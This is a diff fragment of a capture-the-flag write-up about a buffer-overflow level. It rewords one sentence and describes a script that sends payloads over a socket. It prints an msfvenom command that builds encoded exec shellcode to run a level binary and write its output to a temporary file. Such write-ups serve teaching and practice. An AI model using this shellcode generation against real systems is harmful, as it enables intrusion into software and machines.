livz/livz.github.io/_posts/2016-01-28-binary-master-ensign-4.md

 done
 ```

 The python script **bof.py** constructs and sends a payload over the socket for each value in the chosen range.
 One more thing here.
 We need a different shellcode than before.
 Spawning /bin/dash will not help us at all.
-I went for running the **victory** and piping the result to a temporary file:
+I went for a payload that runs the **victory** binary and pipes the result to a temporary file:
 ```bash
 # msfvenom  -p linux/x86/exec CMD="/home/level5/victory > /tmp/out" -e x86/shikata_ga_nai -b '\x00' -f python
 ```